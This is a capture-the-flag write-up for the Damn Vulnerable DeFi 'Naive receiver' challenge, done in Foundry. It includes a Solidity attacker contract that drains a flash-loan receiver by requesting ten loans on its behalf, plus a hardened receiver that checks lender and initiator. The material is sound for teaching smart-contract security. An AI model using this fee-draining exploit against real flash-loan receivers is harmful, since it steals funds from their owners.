Challenge 2 - Naive receiver
To learn Solidity and Foundry systematically, I am rewriting the damn-vulnerable-defi solutions on top of the Foundry test framework. Discussion and contributions are welcome~🎉
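The goal of the attack is to empty the receiver's balance. Every flash loan executed through the pool costs a fee of 1 ETH, so it is enough to run ten flash loans against the pool with the receiver as the borrower: all 10 ETH end up in the pool as fees.
The challenge asks us to do this in a single transaction if possible, so we can write a contract that performs the ten flash loans in one transaction.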
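```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "../../src/naive-receiver/FlashLoanReceiver.sol";
import "../../src/naive-receiver/NaiveReceiverLenderPool.sol";
import "openzeppelin-contracts/contracts/interfaces/IERC3156FlashBorrower.sol";

contract Attacker {
    // All ten loans run inside the constructor, so deploying this
    // contract is the single transaction that drains the receiver.
    constructor(address payable _pool, address payable _receiver) {
        NaiveReceiverLenderPool pool = NaiveReceiverLenderPool(_pool);
        for (uint256 i = 0; i < 10; i++) {
            // The receiver is named as borrower and pays the 1 ETH fee each time.
            // The second argument is the placeholder address the pool uses for ETH.
            pool.flashLoan(IERC3156FlashBorrower(_receiver), address(0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE), 1, "0x");
        }
    }
}
```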
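A defensive counterpart to the drain described above, as an added example that is not part of the original post or of damn-vulnerable-defi: a receiver that rejects flash loans it did not initiate. The contract name `GuardedFlashLoanReceiver`, the `owner` and `maxFee` fields and the error names are hypothetical; it assumes the pool passes its own caller as `initiator`, as ERC-3156 requires of lenders, and that the pool accepts plain ETH transfers for repayment.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.4;

import "openzeppelin-contracts/contracts/interfaces/IERC3156FlashBorrower.sol";

// Added example: hypothetical hardened receiver, not the challenge's own contract.
contract GuardedFlashLoanReceiver is IERC3156FlashBorrower {
    address private constant ETH = 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE;
    bytes32 private constant CALLBACK_SUCCESS = keccak256("ERC3156FlashBorrower.onFlashLoan");

    address public immutable pool;   // the only lender this receiver trusts
    address public immutable owner;  // the only account allowed to start a loan
    uint256 public immutable maxFee; // upper bound on the fee the owner accepts

    error UntrustedLender();
    error UntrustedInitiator();
    error UnsupportedCurrency();
    error FeeTooHigh();

    constructor(address _pool, uint256 _maxFee) {
        pool = _pool;
        owner = msg.sender;
        maxFee = _maxFee;
    }

    function onFlashLoan(address initiator, address token, uint256 amount, uint256 fee, bytes calldata)
        external
        override
        returns (bytes32)
    {
        // The callback must come from the trusted pool...
        if (msg.sender != pool) revert UntrustedLender();
        // ...and the loan must have been requested by the owner. Assumption:
        // the pool forwards its msg.sender as `initiator` (ERC-3156 behaviour).
        if (initiator != owner) revert UntrustedInitiator();
        if (token != ETH) revert UnsupportedCurrency();
        // Refuse to pay more than the owner agreed to.
        if (fee > maxFee) revert FeeTooHigh();

        // (application logic using the borrowed funds would go here)

        // Repay principal plus fee; assumes the pool has a payable receive().
        (bool ok, ) = pool.call{value: amount + fee}("");
        require(ok, "repay failed");
        return CALLBACK_SUCCESS;
    }

    receive() external payable {}
}
```

With the initiator check in place, a loan requested by any third-party contract reverts inside the callback, so the fee is never taken from the receiver.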